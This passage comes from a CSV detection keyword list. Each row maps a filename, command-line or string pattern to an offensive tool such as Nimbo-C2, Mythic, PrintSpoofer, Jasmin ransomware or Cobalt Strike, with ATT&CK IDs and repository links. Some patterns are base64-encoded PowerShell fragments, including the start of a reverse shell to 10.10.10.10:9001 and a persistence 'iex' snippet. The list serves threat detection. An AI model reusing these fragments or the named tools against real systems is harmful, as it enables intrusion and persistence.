T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*itaymigdal/LOLSpoof*",".{0,1000}itaymigdal\/LOLSpoof.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*it-gorillaz/lnk2pwn*",".{0,1000}it\-gorillaz\/lnk2pwn.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","1","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*itm4n/Perfusion*",".{0,1000}itm4n\/Perfusion.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*itm4n/PPLmedic*",".{0,1000}itm4n\/PPLmedic.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*itm4n/PrintSpoofer*",".{0,1000}itm4n\/PrintSpoofer.{0,1000}","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*itm4n/PrintSpoofer*",".{0,1000}itm4n\/PrintSpoofer.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" 
"*itm4n/PrivescCheck*",".{0,1000}itm4n\/PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*itm4nprivesc*",".{0,1000}itm4nprivesc.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*its-a-feature/Apfell*",".{0,1000}its\-a\-feature\/Apfell.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*its-a-feature/Mythic*",".{0,1000}its\-a\-feature\/Mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*its-a-feature/Mythic*",".{0,1000}its\-a\-feature\/Mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - 
T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*itsKindred*",".{0,1000}itsKindred.{0,1000}","offensive_tool_keyword","Github Username","GitHub username hosting malware samples and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/itsKindred","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ItsNee/Follina-CVE-2022-30190-POC*",".{0,1000}ItsNee\/Follina\-CVE\-2022\-30190\-POC.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*itunes_backup2john.pl*",".{0,1000}itunes_backup2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*itwasalladream -u * -p * -d *",".{0,1000}itwasalladream\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner.
Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","0","N/A","7","8","746","114","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*ItWasAllADream-master*",".{0,1000}ItWasAllADream\-master.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","746","114","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*IUnknownObj.cpp*",".{0,1000}IUnknownObj\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*IvanGlinkin/AutoSUID*",".{0,1000}IvanGlinkin\/AutoSUID.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","7","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*ivre-masscan/*",".{0,1000}ivre\-masscan\/.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*Ivy_1*_darwin_amd64*",".{0,1000}Ivy_1.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*Ivy_1*_linux_amd64*",".{0,1000}Ivy_1.{0,1000}_linux_amd64.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*Ivy_1*_windows_amd64.exe*",".{0,1000}Ivy_1.{0,1000}_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*Ivy-main.zip*",".{0,1000}Ivy\-main\.zip.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*iwantmore.pizza/posts/PEzor.html*",".{0,1000}iwantmore\.pizza\/posts\/PEzor\.html.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 
- T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*iwork2john.py*",".{0,1000}iwork2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA*",".{0,1000}JAB4ACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAG4AYQBtAGUAOwAgACIAJABwAGkAZAAgACQAeAAuAGUAeABlACIA.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" 
"*JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBu*",".{0,1000}JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBu.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA*",".{0,1000}JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" 
"*JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB*",".{0,1000}JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*jackdaw --*",".{0,1000}jackdaw\s\-\-.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","N/A","N/A","6","546","89","2024-03-21T15:22:56Z","2019-03-27T18:36:41Z" "*jackdaw.py*",".{0,1000}jackdaw\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","546","89","2024-03-21T15:22:56Z","2019-03-27T18:36:41Z" "*jackit --reset --debug*",".{0,1000}jackit\s\-\-reset\s\-\-debug.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*jackson5sec/ShimDB*",".{0,1000}jackson5sec\/ShimDB.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt*",".{0,1000}jaeles\sscan\s\-s\sbigip\-cve\-2020\-5902\.yaml\s\-U\shttps_url\.txt.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*janoglezcampos/rust_syscalls*",".{0,1000}janoglezcampos\/rust_syscalls.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*jas502n/bypassAV*",".{0,1000}jas502n\/bypassAV.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*jas502n/CVE-2020-5902*",".{0,1000}jas502n\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","370","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*Jasmin 
Decryptor.csproj*",".{0,1000}Jasmin\sDecryptor\.csproj.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Decryptor.exe*",".{0,1000}Jasmin\sDecryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Decryptor.pdb*",".{0,1000}Jasmin\sDecryptor\.pdb.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Decryptor.sln*",".{0,1000}Jasmin\sDecryptor\.sln.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Encryptor.csproj*",".{0,1000}Jasmin\sEncryptor\.csproj.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Encryptor.exe*",".{0,1000}Jasmin\sEncryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Encryptor.sln*",".{0,1000}Jasmin\sEncryptor\.sln.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Encryptor\bin\Release*",".{0,1000}Jasmin\sEncryptor\\bin\\Release.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Ransomware C2 Checkin*",".{0,1000}Jasmin\sRansomware\sC2\sCheckin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin%20Decryptor.exe*",".{0,1000}Jasmin\%20Decryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is 
an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin%20Decryptor.pdb*",".{0,1000}Jasmin\%20Decryptor\.pdb.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin%20Encryptor.exe*",".{0,1000}Jasmin\%20Encryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin_Decryptor.mainform*",".{0,1000}Jasmin_Decryptor\.mainform.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin_Decryptor.Properties*",".{0,1000}Jasmin_Decryptor\.Properties.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" 
"*'jasminadmin'@'localhost'*",".{0,1000}\'jasminadmin\'\@\'localhost\'.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*jasmin-ransomware-master*",".{0,1000}jasmin\-ransomware\-master.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*jatayu.php*",".{0,1000}jatayu\.php.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","32","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*jatayu-image.png*",".{0,1000}jatayu\-image\.png.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","32","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*java -jar BeaconTool.jar*",".{0,1000}java\s\-jar\sBeaconTool\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
